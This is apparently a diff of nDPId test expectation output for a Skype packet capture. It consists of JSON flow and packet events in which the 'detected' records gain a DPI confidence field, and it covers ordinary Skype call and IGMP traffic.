 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/GQkAAEARSEjAqAEiQAQXjzLdnFIAK+Dtm\/ACn46vTpwjXGMZ9bJtrKD0Tox8o\/uW9MNcEfVIZROhfxw="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+3+IAAEARuLHAqAEiQTffGTLdnFwAKrqUm\/ICs3eZ5yAavzTYAFVG6cHtvks6WRTX6quz\/un4rGT7CA=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"skype.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1431969662422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431969662422,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/8JUAAEAR8n\/AqAEinTc4lzLdnFsAK42nm\/QCY347bApK+fSJyR3vpMK2pFmarm3qJcKY67tEOMSW2tE="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"skype.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969662422,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.151","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663377,"flow_last_seen":1431969663377,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431969663377,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431969663377,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969663377,"pkt":"0NQSxnP1PBXCt3IOCABFAABA1DJAAEAGhNzAqAEinTeCp8N8nF+W1hb6AAAAALAC\/\/8sigAAAgQFtAEDAwUBAQgKPiLc+gAAAAAEAgAA"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy1ywAAEARC+fAqAEinTc4pjLdnFYAHmpym\/YCUIZT7d8ZZahDgzlHGwrFeQgMHw=="}
-00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"skype.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAABBojAAAEARjU7AqAEi1cezmzLdnEQALVYJm\/gCocGAOu9ctMRuZg09sIXFBXfoFp0ezBOePl8z3klTgDOO8A=="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"skype.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAABA4LIAAEARBt3AqAEinTg0GzLdnFsALK5Hm\/oC27Di400dfPUDJrwFd8eoU\/psKrn9OzjyFuH7NFUpoc4x"}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyTM0AAEAR4z7AqAEinTfrrTLdnEwAHgM8m\/wCyw55OL3+chZLjMlighndXw9\/qA=="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"skype.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.173","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1431969663378,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431969663378,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5cNoAAEARvzrAqAEinTfrnTLdnEoAJXKym\/4Cz\/csSQ42SRwcVm84KNSC1Bge6u0+CtZPiaQ="}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"skype.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969663378,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.157","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1431969663505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969663505,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhOdN4KnwKgBIpxfw3yB0ZuyltYW+6ASOJDi6AAAAgQFrAQCCApOq7XZPiLc+gEDAwk="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1431969663505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969663505,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0s6BAAEAGpXrAqAEinTeCp8N8nF+W1hb7gdGbs4AQECw5lAAAAQEICj4i3XlOq7XZ"}
 00529{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
 00432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1431969664357,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"ts_msec":1431969664357,"pkt":"AQBeAAABoPPBbTu2CABGrAAgAAAAAAECgoTAqAD+4AAAAZQEAAARZO6bAAAAAA=="}
-00562{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00588{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":702,"source":"skype.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664357,"flow_last_seen":1431969664357,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431969664357,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8z44AAEARX+vAqAEi1cezpTLdnEcAKEGUnAACQndt5hKcGQjs\/aUFepuMkaIJ9906aCWz4pv6M2E="}
-00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":703,"source":"skype.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1431969664405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431969664405,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyGYIAAEARfyPAqAEiQTffFDLdnGEAHnjQnAICuB3xnzqHf8BCJKQQ6ooGPwkzRg=="}
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":704,"source":"skype.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969664405,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
